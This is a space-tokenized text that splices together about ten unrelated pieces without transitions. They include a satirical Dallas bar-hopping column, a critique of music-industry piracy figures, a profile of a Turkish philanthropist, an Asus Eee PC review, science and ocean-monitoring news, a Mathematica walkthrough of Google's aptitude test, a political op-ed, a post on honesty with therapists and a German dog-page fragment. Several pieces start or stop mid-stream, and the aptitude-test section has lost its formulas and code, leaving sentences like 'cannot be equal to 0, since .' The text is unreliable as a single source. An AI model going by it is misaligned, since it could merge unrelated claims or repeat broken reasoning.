" Did you go to UT ? " he asks .
I did n't , I admit .
I went to NYU .
No football there .
But UT 's my surrogate team .
He rolls his eyes .
" That 's lame , " he says .
What am I doing here all by myself , he wants to know .
I 'm a writer , I gush .
I 'm looking for $ 30,000 millionaires .
" Oh , I used to be one of those guys , " he says .
" I fucked up my credit bad . "
I try to keep myself from jumping off of the barstool and kissing him .
A real , live , recovering $ 30,000 millionaire !
Mere inches from me !
Just as I am about to ask him about how he came to be the kind of guy who pays with cash instead of Visa , Tech scores .
A short , blond sorority - type to John 's right cheers .
" GOOOOOO , TECH ! " she screams .
In no time at all , the only conversation available to me is with the back of John 's head .
" That 's my school ! " the girl continues to cheer .
Within seconds , he is ushering her out the door , hand on her lower back , and I am left alone .
Results : Pleased with success in identifying former Homo sapiens douchebagus .
Important lesson learned .
Lose all interesting attributes , become as generic as possible and absolutely do not talk about having a job .
These things detract from the $ 30,000 millionaire 's desire to divulge copious amounts of personal information in an attempt to sleep with me .
Finally , with this understanding of what it would take to lock down a $ 30 k - er , I proceeded to my final destination : Mantus and Naked Sundays .
All the elements aligned that Sunday night — valets , velvet ropes and the fact that it was Sunday .
Lawyers , doctors , businessmen and anyone else likely to be raking in real millions has to work on Monday morning .
Homo sapiens douchebagus ' life of never - ending leisure is the ultimate giveaway .
Taking a cue from a favorite Sex and the City episode in which Miranda , the successful lawyer , pretends to be a flight attendant in order to get dates , I keep my story simple .
I am new in town .
My friends are supposed to meet me soon .
Never been to college , and I 'm studying to be a hairdresser .
Is n't drinking fun ?
Look at my tiny shorts !
Tee - hee !
My cover is almost blown immediately .
While I 'm standing next to the recently discovered porn screen , planning my next move , a familiar face appears in the crowd .
He 's several years older than most of the 20 - somethings in the room , and he's in the telltale striped button - down shirt and pre-distressed jeans .
As he makes his way past me , I narrowly avoid making eye contact .
This man is the founder of a social club called The Beautiful Room , a group of people assembled after their photos are approved by the founder and it is established via a phone interview that they enjoy drinking and bragging about their cars .
There is a monthly fee .
I wrote about the group last year when I infiltrated their ranks in another immersive field study of local assholery .
If Dallas is the land of douchebags , this man is their king .
To my relief , I do n't think he recognizes me .
Last time I saw His Highness , my hair was long and red , not short and brunette like it is today .
I am terrified because the man knows my true identity , but also overjoyed .
Spotting the king is like hitting the Homo sapiens douchebagus jackpot .
Time : Very , very early Monday morning
Location : Mantus ; inside , near their wall of white pleather booths
Target : A short , five - o' clock - shadowed guy wearing a T - shirt I estimate at approximately 2.5 times too small .
I " accidentally " bump into him while climbing over an ottoman .
" Oh , excuse me ! "
" No , babe , it 's fine .
You 're looking good tonight . "
He smiles and gives me a little " Cheers ! " clinking his glass with mine .
" Oh , thanks .
I 'm waiting on my friends .
I 've never been here before !
This place is really nice ! " I babble .
" Oh , it 's the only place to be on Sunday .
I 'm new here too . "
This is Justin , and he recently made the trek north from Austin .
I tell him I was at Kenichi on Saturday , trying to keep the conversation safely in booze - and - bragging territory .
" That place is good , " he says .
" I know the owner , like , really well .
I 'm going to go broke eating there ! "
He laughs a little too hard .
" Not really , you know . "
" Right , " I laugh , a little harder .
What brings him up from Austin ?
" Software , " he says , vaguely .
" I sell software . "
" Oh , computers are fun ! " I offer .
What brings me to town ?
" I 'm going to be a hairdresser .
Hair school . "
He grins , wrapping his arm around my waist .
" You know what would be a sexy date ?
You give me a haircut , and we 'll share a bottle of wine . "
" Would n't that be a dangerous date ? " I ask .
I do n't mention the fact that his receding hairline did n't leave much cutting to be done .
Before I can determine if we 're going back to his place or mine — $ 30 k - ers almost always insist on the girl 's place — King Douche appears right over Justin 's shoulder as if he 's about to interrupt our conversation .
" Well , it was nice to meet you .
I 'm going to have a cigarette ! " I squeal and head for the patio .
Results :
High likelihood of Homo sapiens douchebagus , considering his apparent friendly relationship with Douche Vader , vague " software " reference and name - drop of the Kenichi owner .
I flee potential outing by the Czar of Assholery by chain - smoking Camels in Mantus ' underground porch .
My feet are aching , and I 've got a case of the caffeine jitters courtesy of four Diet Cokes .
A drunk guy named Juan tries to woo me after I ask him for a light .
" I saw you over by the porn earlier , " he says .
A veritable Don Juan , indeed !
We talk for a few minutes , and he tells me he 's a medical student .
" Probably surgery .
Something like that . "
He 's too far gone to be milked for $ 30,000 millionaire info , though he 's a likely candidate .
" What 's your name again ? " he asks , flipping open his phone to take down my number .
Seconds after I take leave of him , a guy in a loud , purplish button - down shirt asks me for a cigarette .
This one " used to be a jewelry designer . "
Today , he sells furniture .
He 's got the day off tomorrow , he mentions .
Nothing to do tomorrow morning .
Nowhere to be .
Hint , hint , hint .
I stop caring if he 's a $ 30,000 millionaire or just a garden - variety douchebag .
I stomp out my smoke in mid-cig and make for the valet stand .
It 's almost 2 a.m .
While I 'm waiting for the valet to bring my car , I reflect on all the field interviews conducted over the past several weeks .
Taken together , these guys equal just about one stereotypical $ 30,000 millionaire , but I never managed to turn up the total package in one guy .
Dismayed , I shift back and forth on my heels and try to calm my aching head — until fate gives me one last wink .
The couple in front of me — a guy in a white button - down and loafers , girl in a sexy top and jeans — walk toward a black sedan as the valet pulls up .
It is a BMW .
The valet climbs out of the driver 's seat , and the guy gives her a nod and a set of finger - guns .
As they speed away , I catch the silver lettering on the back of the car : 328i .
Bigfoot disappears into the brush .
The IFPI recently published their latest digital music report .
Amongst their claims " illegal downloading " outperforms legal downloading by a ratio of 20:1 , and that because of this , the recording industry has lost US $ 3.7 billion .
Picking apart these ideas reveal that they may be very misleading .
The very idea that music sales are declining seems to leave record companies scratching their heads .
They ca n’t understand why people who once paid $ 20 for an album are no longer willing .
The industry seems to think that music should be valued similar to movies .
Is an album , which costs little to produce , really worth the same as a movie , which costs a fortune , often 200x more , to produce ?
DVDs and music CDs are often very similarly priced .
The press releases put out by the recording industry focus solely on piracy for declining sales , while in reality there are so many reasons .
Most have been covered so many times by the media and academics , but we ’ll re-iterate a few here .
The Decline in Music Sales
The CD format has now been around for over 25 years .
Back - catalogues have been re-released on the medium and consumers lapped it up , replacing their analogue copies of music they own .
However , there ’s only so many back - catalogues to buy , leaving consumers either only purchasing new music or none at all .
A decline in CD sales is an indication of saturation in a market where innovation is lacking .
There ’s also only so many “ best of ’s ” , “ greatest hits ” and other compilation albums consumers are going to buy before thinking “ I already own three copies of most of these songs , why would I buy another one ? ”
Format - shifting , the art of moving from one medium to another is on the rise .
In the past consumers have moved their collection of music to different formats , usually because of quality improvements and convenience , and paid for the privilege .
Now it seems consumers do n’t think they should have pay to move their collection of music to their computers and media players , and especially not pay to receive an inferior quality copy of something they already own .
It just does n’t make sense .
“ Illegally downloading ” seems logical .
Digital copies of music , which were until recently usually DRM crippled , and are still poor quality in relation to CDs , are simply unattractive .
The thought also never seems to occur to the music industry that perhaps Avril Lavigne , Utada Hikaru , Rihanna , T - Pain and Akon ( the artists behind the top 5 digital downloads in 2007 ) are simply unattractive to the public .
How much manufactured pop can society take ?
The Problems With P2P Statistics
There is no doubt that piracy is on the rise .
This in in part due to the aforementioned , overpriced , inferior or non-existing alternatives .
This aside , it is absolutely ridiculous to compare downloads with actual sales .
Let ’s sum up a few of the reasons .
Firstly , just because someone chooses to download music via P2P does n’t mean they ’re doing it illegally .
The recording industry has stated numerous times that it will not sue people for format - shifting , whereby consumers would want a digital copy of music they physically own .
Why go to the hassle of copying a CD you own to your PC / media player , when someone else out there has done it for you ?
There ’s a lot to consider when digitizing music from CD , though the one - click approaches of programs like iTunes would let you believe otherwise .
Indeed their exists numerous guides on how to best digitize music you own , most notably jiGGafellz ’ guide .
Secondly , do these numbers include the antics of MediaDefender ?
They flood P2P networks with fake files , which unsuspecting users will often download .
How many fake files does someone download before managing to get a genuine copy ?
Even when they have a real copy , how many times before they get one in a high enough quality to suit them ?
Thirdly , what about those who download with the sole intention of improving their share ratio on private sites ?
Sites like OiNK were notorious for users downloading popular releases with no intention of listening to them , just to try and better their ratio .
Similarly , users often download entire albums just to listen to one track .
While BitTorrent clients have the ability to do selective downloading , broadband connections are becoming so fast that users do n’t feel the need to .
Other P2P networks where albums might be shared in archives such as .zip , .rar or .tar remove the ability to selective download .
Fourthly , a great deal of people seem obsessed with discographies .
They would download an artist ’s entire back catalogue of music just because they like collecting , often without listening to it .
A New Business Model ?
The million dollar question of course is , what should the recording industry do ?
We know that there is no straightforward answer to this question , but we speculated about some of the options before .
The Internet has changed the way people interact with music .
Sites like OiNK made is easy to find and share virtually every piece of music ever produced .
Services like last .fm on their turn made it easy to discover new artists , and interact with other fans .
The Internet and filesharing technologies make it possible to make production ( of the copies ) and distribution costs disappear , yet the prices still do n’t change .
Why ?
Because they cling onto their old business models .
Today , the average consumer buys approximately 3/5 CDs a year .
Let ’s say the labels make $ 25 a year per consumer .
Now , what if the record labels decided to make their entire collection available online , and charge people $ 2.50 a month for a subscription .
This way they could easily double their revenue .
New business models will emerge , and I ’m pretty sure piracy will pretty much cease to exist .
The record industry can even outsource the distribution to online music services , who can even offer the music for free if they come up with other revenue streams to compensate the $ 2.50 a month per user .
I ’m just thinking out loud here , but there are tons of possibilities .
So , stop complaining about biased statistics , go back to work and do what you ’re supposed to … distribute music to the fans !
ISTANBUL  Stuck in a traffic jam in his bulletproof BMW , the richest man in Turkey lets loose with a satisfied grin .
Since 2000 , Husnu M. Ozyegin has spent more than $ 50 million of his own money , building 36 primary schools and girls ’ dormitories in the poorest parts of Turkey .
Next to the Turkish government , Mr. Ozyegin is the biggest individual supporter of schools in the country  and an official from the education ministry has told him that his market share is increasing .
“ Not bad , ” he says in his gruff , cigarette - scarred voice as he pockets his mobile phone .
“ If I can have an impact on one million Turkish people in the next 10 years , I will be happy . ”
The global wealth boom has created a new breed of billionaire in once - destitute countries like Turkey , India , Mexico and Russia .
Propelled by their rising economies , robust currencies and globally competitive companies , they have ridden a surge in local stock markets that have reached previously untouchable heights in a short five - year timeframe .
Now , a number of them are using their wealth to bolster their standing and push for social changes .
Good things come in small packages
The Asus Eee PC challenges many conventional assumptions about mobile computing .
The daring , diminutive device combines a svelte subnotebook form factor with a unique Linux software platform and a budget - friendly price — factors that could make this unprecedented product a mainstream marvel .
Last week , my colleague Jon described the Eee PC as game - changing : a characterization that we will put to the test in this review .
Tech specs
CPU : 900 Mhz Intel Mobile Celeron
Video : Intel GMA 900
Display : 7 " LCD widescreen at 800x480
Storage : 4GB internal flash
OS : Custom Xandros - based Linux
RAM : 512MB
Optical drive : None
Networking : Atheros AR5007EG wireless ,
10/100 ethernet
First impressions
The most striking characteristic of the Eee PC is its unbelievably small size .
At 8.9 " x 6.5 " x 1.4 " and approximately 2.03lb , the Eee delivers serious mobility .
When closed , it 's approximately the same size as a hardcover book .
It 's also very easy to tote around while it is open and can be comfortably held in only one hand .
The exterior has a glossy , pearl - white finish that picks up fingerprints very easily , but seems a bit more dirt - resistant than the plain white finish of a MacBook .
According to Asus , the Eee PC will eventually be available in a range of colors , including pink , green , and black .
The Eee battery is a round module that fits into the back underneath the screen between the two hinges .
The battery fits tightly with no wiggling and can be removed by sliding two clasps simultaneously .
The hinges for the lid are very big and seem sufficiently sturdy .
The screen , which takes up only part of the lid , is flanked by two large speakers and is surrounded by a wide bezel .
The 4GB Eee has an embedded 0.3 megapixel video camera which is built into the bezel above the screen .
The Eee has several vents on the bottom and one on the side .
A panel on the bottom can be removed to provide access to the Eee's RAM , but opening the panel voids the warranty .
Intrepid modders have already successfully replaced the built - in 512MB stick with 1GB .
When running , the Eee generates very little fan noise .
After several hours of use , the machine gets very warm but can still be used comfortably on a lap .
The Eee has a row of LEDs along the front - right side that indicate battery status , drive access , and wireless connectivity .
Keyboard and touchpad
The Eee keyboard is easily the device 's most significant weakness .
The keys are very small and are positioned too close together , which makes the keyboard feel cramped .
The layout is also a bit odd , with all of the number keys placed one position to the left of where they should be .
Despite the small size , I was able to touch - type on the keyboard right away .
During the first few hours of use , I made many typing errors and frequently hit the wrong key .
My accuracy gradually improved , and after several days of use I can now type on it almost as well as I can type on a regular laptop keyboard .
There are several mistakes that I still make on a regular basis .
I often hit the Enter key when I 'm trying to type an apostrophe , and I often hit the 2 key when I 'm trying to hit the 1 key .
The odd number placement is particularly frustrating if you have passwords that include numbers , because you can easily hit the wrong ones without even realizing it when typing into an obscured password field .
In addition to all of the regular letter , number , and symbol keys , the Eee keyboard has a full row of F keys that can be used to adjust volume and brightness or toggle WiFi when used with the Fn key to the right of the control key .
The keyboard also has arrow keys in the expected place and a context menu key .
On the Eee keyboard , the key that would usually be the Windows key on regular keyboards is decorated with a small house icon .
Like the keyboard , the Eee touchpad is very small and will require users to adapt a little bit .
It took me a day of use to become accustomed to the Eee touchpad .
At the bottom of the touchpad is a single bar that serves for both left and right click depending on which side is pressed .
On most Linux distributions , you can simulate a middle - click by pressing both sides at once , but this is somewhat difficult to do on the Eee because its a single button .
The touchpad also has standard support for tap - clicking and finger scrolling .
U.S. ( TGW ) – U.S. scientists have developed a microfiber fabric that generates its own electricity .
If made into a shirt , the fabric would generate power simply from the wearer moving .
" The fiber - based nanogenerator would be a simple and economical way to harvest energy from the physical movement , " Zhong Lin Wang of the Georgia Institute of Technology , who led the study , said .
Tiny fibers in the fabric rub up against each other when the wearer moves , creating electricity .
" Our estimates show we can have up to 80 milliwatts per square meter of this fabric .
This is enough to power a little iPod or charge a cell phone battery , " Wang said .
The challenge that remains for the team is solving the problem that the fiber degrades when wet .
The fabric has the most promise for hikers or soldiers .
Via :: Reuters
By Stephen Leahy
Nov 27 ( IPS ) –
If continents are the Earth ’s sturdy bones and the atmosphere its thin skin , then the oceans are its heart , circulatory system and blood .
And despite the crucial role played by the oceans in the health of the planet , and to our own health and well - being , there is little monitoring of ocean health .
Once the oceans were too big and too deep to probe , measure and observe , but between satellites , undersea robots , electronically tagged fish and deep sea sensors , scientists now have the tools .
On Tuesday , high - level officials began meeting in Cape Town , South Africa to see if governments have the will to create a Partnership for Observation of the Global Oceans ( POGO ) — a 10 - year project to create a comprehensive monitoring system of what has been described as the last frontier .
“ We have pathetically few measurements of the oceans relative to their importance to life on Earth and the extent to which we rely on them for energy , weather , food and recreation , ” said D. James Baker , former administrator of the U.S. National Oceanic and Atmospheric Administration .
Humans are creatures of the land and do not fully understand that the seas create the conditions that make life possible .
Seawater covers 71 percent of the planet , and we often think of oceans only in terms of beaches and fish , said Howard Roe , director emeritus of the National Oceanography Centre in Southampton , England , and past POGO chair .
“ The oceans control the global climate and our weather , ” Roe told IPS .
Direct ocean temperature measurements from an array of 3,000 free - drifting “ Argo buoys ” provides crucial information that enables weather forecasters to make long range predictions , he said .
“ Every successful El Nino prediction saves at least a billion dollars by allowing people to react in time , ” he noted .
Advance warnings of the Indian Ocean tsunami of December 2004 would have saved thousands of lives and billions of dollars .
A new system of 32 additional Deep Ocean Assessment and Reporting of Tsunami stations are to be deployed in the Indian , Caribbean and Atlantic Oceans and would be part of POGO .
“ A system for ocean observing and forecasting that covers the world ’s oceans and their major uses can reduce growing risks , protect human interests and monitor the health of our precious oceans , ” said Tony Haymet , director of the Scripps Institution of Oceanography at the University of California in San Diego and chair of POGO ’s executive committee .
For complete article please click Planetary Check - Up Starts With the Oceans
Related stories :
Acid Oceans to ‘ Dissolve ’ Coral Reefs in 30 years
Ocean No Longer Taking As Much CO2 ( and why that ’s bad news )
Peak Fish : The Beginning of the End of Ocean Seafood
Aliens of the Deep Seas
Mathematica's Google Aptitude
By Ed Pegg Jr. and Eric W. Weisstein
With additional contributions by Daniel Lichtblau , Adam Strzebonski , Oyvind Tafjord , and Michael Trott
October 13 -- Many internet denizens have heard of Sergey Brin , President of Technology at google.com .
What they may not know is that before cofounding the precursor to Google in 1998 and subsequently becoming a multibillionaire , Brin was an intern at Wolfram Research ( makers of Mathematica , as well as sponsors of MathWorld ) .
The Billboard
So perhaps it's no great surprise that Google utilizes unusually mathematically oriented recruitment techniques .
In fact , these practices have received widespread coverage in the last few weeks and months following the erection of a mathematical billboard in Silicon Valley on southbound Highway 101 near Ralston , California in July 2004 .
The billboard poses the question of finding the first 10 - digit prime number occurring in consecutive digits ( i.e. , the decimal expansion ) of the mathematical constant known as e , which is a transcendental number whose first few digits are 2.7182818284 ....
The unusal nature of the billboard prompted coverage through numerous mainstream media outlets such as National Public Radio , The Boston Globe , and the Oakland Tribune , as well as ( of course ) on the internet .
Ed mentioned the puzzle on his MathPuzzle website on July 13 , 2004 .
Minutes after its posting , Wolfram Research CEO and A New Kind of Science author Stephen Wolfram sent the solution as a single line of Mathematica code :
Select [ FromDigits/@Partition [ First [ RealDigits [ E,10,1000 ] ] , 10,1 ] , PrimeQ , 1 ]
{ 7427466391}
The Billboard , Level 2
Upon determining this value and typing the corresponding URL https://7427466391.com into a web browser , a potential Google employee ( or curious MathWorld news story reader ) is taken to a web page congratulating him ( or her ) and providing instructions for the second level of the puzzle , which involves finding the next term of the following sequence :
f ( 1 ) = 7182818284
f ( 2 ) = 8182845904
f ( 3 ) = 8747135266
f ( 4 ) = 7427466391
f ( 5 ) = __________
If the first two terms look familiar , that 's because they are 10 - digit portions of the decimal expansion of e given above .
In fact , a little extra analysis shows that they are precisely those 10 - digit portions summing to 49 .
After having determined that , it is easy to find the next number , again using Mathematica :
FromDigits/@Select[ Partition [ First [ RealDigits [ E,10,1000 ] ] , 10,1 ] , Total [ # ] ==49&,5 ]
{ 7182818284,8182845904,8747135266,7427466391,5966290435}
This is sequence A095926 in Neil Sloane 's On - Line Encyclopedia of Integer Sequences
While we could likely continue this discussion at least a little further , we prefer at this juncture to leave additional levels of the billboard puzzle to the enterprising reader .
Son of Billboard : The Google Labs Aptitude Test
On September 30 , Google concocted an even more challenging recruitment device : the Google Labs Aptitude Test .
Hardcopies of this test were also distributed to University of Illinois students in the October 12 edition of The Daily Illini .
While some of the questions on the test relate more to computer knowledge and general creativity , many of them are highly mathematical .
And for the these problems , Mathematica clearly shows its extremely high mathematical aptitude by solving them easily , especially when guided by a little research on MathWorld and other online resources such as the On - Line Encyclopedia of Integer Sequences .
We thank our former intern for doing his part in bringing fun mathematics problems into the news .
A Mathematica version of the test , with answers , is available for download below .
file format size AptitudeTest.nb notebook 92 K
Google Labs Aptitude Test Partially Answered
1 . Solve this cryptic equation , realizing of course that values for M and E could be interchanged .
No leading zeros are allowed .
WWWDOT - GOOGLE = DOTCOM
This can be solved through systematic application of logic .
For example , cannot be equal to 0 , since .
That would make , but , which is not possible .
Here is a slow brute - force method of solution that takes a few minutes on a relatively fast machine :
This gives the two solutions
777589 - 188106 == 589483
777589 - 188103 == 589486
Here is another solution using Mathematica 's Reduce command :
A faster ( but slightly more obscure ) piece of code is the following :
Faster still using the same approach ( and requiring ~ 300 MB of memory ) :
Even faster using the same approach ( that does not exclude leading zeros in the solution , but that can easily be weeded out at the end ) :
Here is an independent solution method that uses branch - and - prune techniques :
And the winner for overall fastest :
2 . Write a haiku describing possible methods for predicting search traffic seasonality .
MathWorld 's search engine
seemed slowed this May .
Undergrads
prepping for finals .
3. 1
1 1
2 1
1 2 1 1
1 1 1 2 2 1
What 's the next line ?
312211 .
This is the " look and say " sequence in which each term after the first describes the previous term : one 1 ( 11 ) ; two 1s ( 21 ) ; one 2 and one 1 ( 1211 ) ; one 1 , one 2 , and two 1's ( 111221 ) ; and so on .
See the look and say sequence entry on MathWorld for a complete write - up and the algebraic form of a fascinating related quantity known as Conway 's constant .
4 . You are in a maze of twisty little passages , all alike .
There is a dusty laptop here with a weak wireless connection .
There are dull , lifeless gnomes strolling around .
What dost thou do ?
A ) Wander aimlessly , bumping into obstacles until you are eaten by a grue .
B ) Use the laptop as a digging device to tunnel to the next level .
C ) Play MPoRPG until the battery dies along with your hopes .
D ) Use the computer to map the nodes of the maze and discover an exit path .
E ) Email your resume to Google , tell the lead gnome you quit and find yourself in whole different world [ sic ] .
In general , make a state diagram .
However , this method would not work in certain pathological cases such as , say , a fractal maze .
For an example of this and commentary , see Ed Pegg 's column about state diagrams and mazes .
5 . What 's broken with Unix ?
Their reproductive capabilities .
How would you fix it ?
[ This exercise is left to the reader . ]
6 . On your first day at Google , you discover that your cubicle mate wrote the textbook you used as a primary resource in your first year of graduate school .
Do you :
A ) Fawn obsequiously and ask if you can have an autograph .
B ) Sit perfectly still and use only soft keystrokes to avoid disturbing her concentration
C ) Leave her daily offerings of granola and English toffee from the food bins .
D ) Quote your favorite formula from the textbook and explain how it 's now your mantra .
E ) Show her how example 17b could have been solved with 34 fewer lines of code .
[ This exercise is left to the reader . ]
7 . Which of the following expresses Google 's over - arching philosophy ?
A ) " I 'm feeling lucky "
B ) " Do n't be evil "
C ) " Oh , I already fixed that "
D ) " You should never be more than 50 feet from food "
E ) All of the above
[ This exercise is left to the reader . ]
8 . How many different ways can you color an icosahedron with one of three colors on each face ?
For an asymmetric 20 - sided solid , there are possible 3 - colorings .
For a symmetric 20 - sided object , the Pólya enumeration theorem can be used to obtain the number of distinct colorings .
Here is a concise Mathematica implementation :
What colors would you choose ?
[ This exercise is left to the reader . ]
9 . This space left intentionally blank .
Please fill it with something that improves upon emptiness .
For nearly 10,000 images of mathematical functions , see The Wolfram Functions Site visualization gallery .
10 .
On an infinite , two - dimensional , rectangular lattice of 1 - ohm resistors , what is the resistance between two nodes that are a knight 's move away ?
This problem is discussed in J. Cserti's 1999 arXiv preprint .
It is also discussed in The Mathematica GuideBook for Symbolics , the forthcoming fourth volume in Michael Trott 's GuideBook series , the first two of which were published just last week by Springer - Verlag .
The contents for all four GuideBooks , including the two not yet published , are available on the DVD distributed with the first two GuideBooks .
11 . It 's 2 PM on a sunny Sunday afternoon in the Bay Area .
You 're minutes from the Pacific Ocean , redwood forest hiking trails and world class cultural attractions .
What do you do ?
[ This exercise is left to the reader . ]
12 . In your opinion , what is the most beautiful math equation ever derived ?
There are obviously many candidates .
The following list gives ten of the authors ' favorites :
1. Archimedes ' recurrence formula : , , ,
2. Euler formula :
3. Euler - Mascheroni constant :
4. Riemann hypothesis : and implies
5. Gaussian integral :
6. Ramanujan 's prime product formula :
7. Zeta-regularized product :
8. Mandelbrot set recursion :
9. BBP formula :
10 . Cauchy integral formula :
An excellent paper discussing the most beautiful equations in physics is Daniel Z. Freedman 's " Some beautiful equations of mathematical physics . "
Note that the physics view on beauty in equations is less uniform than the mathematical one .
To quote the not - necessarily - standard view of theoretical physicist P.A.M.
Dirac , " It is more important to have beauty in one 's equations than to have them fit experiment . "
13 .
Which of the following is NOT an actual interest group formed by Google employees ?
A. Women 's basketball
B. Buffy fans
C. Cricketeers
D. Nobel winners
E. Wine club
[ This exercise is left to the reader . ]
14 .
What will be the next great improvement in search technology ?
Semantic searching of mathematical formulas .
See https://functions.wolfram.com/About/ourvision.html for work currently underway at Wolfram Research that will be made available in the near future .
15 .
What is the optimal size of a project team , above which additional members do not contribute productivity equivalent to the percentage increase in the staff size ?
A ) 1
B ) 3
C ) 5
D ) 11
E ) 24
[ This exercise is left to the reader . ]
16 . Given a triangle ABC , how would you use only a compass and straight edge to find a point P such that triangles ABP , ACP and BCP have equal perimeters ?
( Assume that ABC is constructed so that a solution does exist . )
This is the isoperimetric point , which is at the center of the larger Soddy circle .
It is related to Apollonius ' problem .
The three tangent circles are easy to construct :
The circle around has diameter , which gives the other two circles .
A summary of compass and straightedge constructions for the outer Soddy circle can be found in " Apollonius ' Problem : A Study of Solutions and Their Connections " by David Gisch and Jason M. Ribando .
17 . Consider a function which , for a given whole number n , returns the number of ones required when writing out all numbers between 0 and n .
For example , f( 13 ) =6 .
Notice that f( 1 ) =1 .
What is the next largest n such that f( n ) =n ?
The following Mathematica code computes the difference between [ the cumulative number of 1s in the positive integers up to n ] and [ the value of n itself ] as n ranges from 1 to 500,000 :
The solution to the problem is then the first position greater than the first at which data equals 0 :
which are the first few terms of sequence A014778 in the On - Line Encyclopedia of Integer Sequences .
Checking by hand confirms that the numbers from 1 to 199981 contain a total of 199981 1s :
18 . What is the coolest hack you 've ever written ?
While there is no " correct " answer , a nice hack for solving the first problem in the SIAM hundred - dollar , hundred - digit challenge can be achieved by converting the limit into the strongly divergent series :
and then using Mathematica 's numerical function SequenceLimit to trivially get the correct answer ( to six digits ) ,
You must tweak parameters a bit or write your own sequence limit to get all 10 digits .
[ Other hacks are left to the reader . ]
19 .
' Tis known in refined company , that choosing K things out of N can be done in ways as many as choosing N minus K from N : I pick K , you the remaining .
This simply states the binomial coefficient identity .
Find though a cooler bijection , where you show a knack uncanny , of making your choices contain all K of mine .
Oh , for pedantry : let K be no more than half N .
' Tis more problematic to disentangle semantic meaning precise from the this paragraph of verbiage peculiar .
20 .
What number comes next in the sequence : 10 , 9 , 60 , 90 , 70 , 66 , ?
A ) 96
B ) 1000000000000000000000000000000000 \
0000000000000000000000000000000000 \
000000000000000000000000000000000
C ) Either of the above
D ) None of the above
This can be looked up and found to be sequence A052196 in the On - Line Encyclopedia of Integer Sequences , which gives the largest positive integer whose English name has n letters .
For example , the first few terms are ten , nine , sixty , ninety , seventy , sixty - six , ninety - six , ….
A more correct sequence might be ten , nine , sixty , googol , seventy , sixty - six , ninety - six , googolplex .
And also note , incidentally , that the correct spelling of the mathematical term " googol " differs from the name of the company that made up this aptitude test .
The first few can be computed using the NumberName function in Eric Weisstein 's MathWorld packages :
A mathematical solution could also be found by fitting a Lagrange interpolating polynomial to the six known terms and extrapolating :
21 . In 29 words or fewer , describe what you would strive to accomplish if you worked at Google Labs .
[ This exercise is left to the reader . ]
The benign interpretation of the Clintons ' evocation of the importance of an LBJ to complement an MLK is about the need for legislative activity to enshrine the vital work of civil rights activists .
As such , it 's a perfectly reasonable analogy to make , if a little condescending to King .
But does it reflect who the Clintons actually are ?
Are they really today 's version of LBJ ?
In fact , unlike most others in this race , we have some direct evidence of how the Clintons , given the power of the White House , responded to the civil rights movement of their own time .
In the 1990s , we saw a burst of grass - roots activism , protest and rhetoric in defense of gay and lesbian equality .
Out of the ashes of the AIDS epidemic , the gay rights movement rose like a phoenix .
And the Clintons , seeing a fund - raising opportunity , reached out to some in the movement to finance their own campaign .
Those donors trusted them .
I wrote the TNR endorsement .
But as soon as the gays had performed their role - financing the Clintons in power and supporting their campaign - the Clintons turned on us .
They dropped their promise to end the military 's ban instantaneously and then presided over a doubling of the discharges of gay servicemembers under the hideous " Do n't Ask , Don't Tell " policy .
They then used the other emerging civil rights issue - marriage equality - to triangulate against gay couples .
They ran ads on Christian radio stations bragging about the Defense of Marriage Act that president Clinton eagerly signed .
And the only gay people they embraced were those willing to continue to trade money for access - and loyalty to the Clintons .
Who helped them devise this anti-gay strategy ?
Dick Morris .
Who recommended hiring him in the first place ?
Hillary Clinton .
Johnson risked his entire coalition on the issue of civil rights - a heroic act that still reverberates today .
The Clintons would n't risk a smidgen of a percentage point in a Mark Penn poll for the duration of a news cycle .
That 's the difference .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
I talk to a lot of people who have mental health issues .
A week does n’t go by that I do n’t meet someone new who tells me a piece of their life story , and I glimpse at the desperation that eats them up inside .
The desperation is usually for things we all hope for — a better life , a life not feeling this way .
A life more “ normal . ”
But after talking to people over all these years , I still ca n’t wrap my head around people who tell me they lie to their therapists .
I just do n’t get it .
I take my car into the mechanic .
I tell him what ’s wrong with my car , or more specifically , the odd noises or strange odors coming from my car , because honestly , I have no idea what ’s wrong with my car .
Those symptoms lead the mechanic to have a few hunches of what to check out that might be wrong with my car .
He checks them out and lo and behold , diagnoses the problem — a faulty fuel pump .
Problem solved , and my car and I go our merry way .
Same with my doc .
I went in for a regular checkup last week .
My doc is the nicest older French guy you ’d ever meet .
He looks like a character right out some classic French film set in a small country town .
He ’s very personable , talks very softly , and asks all the right questions .
He never lets his kind attitude get in the way of his information - seeking .
Now , if something was wrong with me , I ’d say , “ Hey , doc , my arm hurts when I do this . ”
After he gets done saying , “ Well , then do n’t do that ! , ” he would take a look at my arm and try and figure what ’s going on .
Even if it were an embarrassing problem , I ’d find a way to get beyond my embarrassment , because , well , that ’s his job and I ’m paying him to do his job .
I see no reason a therapist should n’t be the same .
You pay a therapist for the time you spend with them .
Their one and only job is to help you find a way to feel better , help you stop repeating unhealthy behaviors or patterns of behavior that are no longer working for you , help you live a better life .
If you lie to your therapist , especially about something important in your life or directly related to your problems , then you ’re wasting your and your therapist ’s time .
If you tell your therapist all about your depression , but leave out the fact that your mom just passed away last month , that ’s an important , valuable piece of information that would be helpful for the therapist to know in order to help you better .
If you tell your therapist you have low self - esteem or always feel insecure about yourself , yet leave out the fact that you purge after eating almost every meal , again , you ’re only impeding your own recovery and treatment .
These are plain and simple lies , called lies of omission .
And they prevent a person from moving forward in treatment .
I believe the reason many people leave out this kind of information is the same reason we have trouble mentioning embarrassing things to our family doc — we ’re embarrassed by what we need to say , and feel the doctor might pass some sort of judgment on us .
Whether it ’s a rational fear or not does n’t really matter , does it ?
One of the reasons many people seek out psychotherapy in the first place is to help combat irrational thoughts and fears , so in that context , it makes sense many of share this fear of being judged or embarrassed .
And yet , if you do nothing else in therapy , you should find some kind of way to share this sort of pertinent information with your therapist .
It does n’t have to be in the first session .
But it does have to happen at some point .
Your therapist wo n’t judge you , and they wo n’t be embarrassed by what you tell them .
They wo n’t criticize you for not sharing this information with them sooner .
All they will do is use it to find a way to better help you and help you move forward .
Update !
Read my followup article on this issue , Read my followup article on this issue , The 10 Common Reasons to Lie to Your Therapist
Why Would You Lie to Your Therapist ?
Hallo !
Mein Name ist Eckbert Heinenberg .
Zusammen mt Lola begrüße ich alle Hundefreunde herzlich auf meiner Hundeseite !
- Zur Zeit im Server - Umzug
demnächst wieder vollständig funktionsfähig -
von Eckbert Heinenberg
Hunde sind der Beste Freund des Menschen – jedenfalls unter den Tieren .
Sicher ist , dass dieser geläufige Satz seine Berechtigung hat .
Allerdings wird es ihnen nur allzu oft schlecht gedankt .
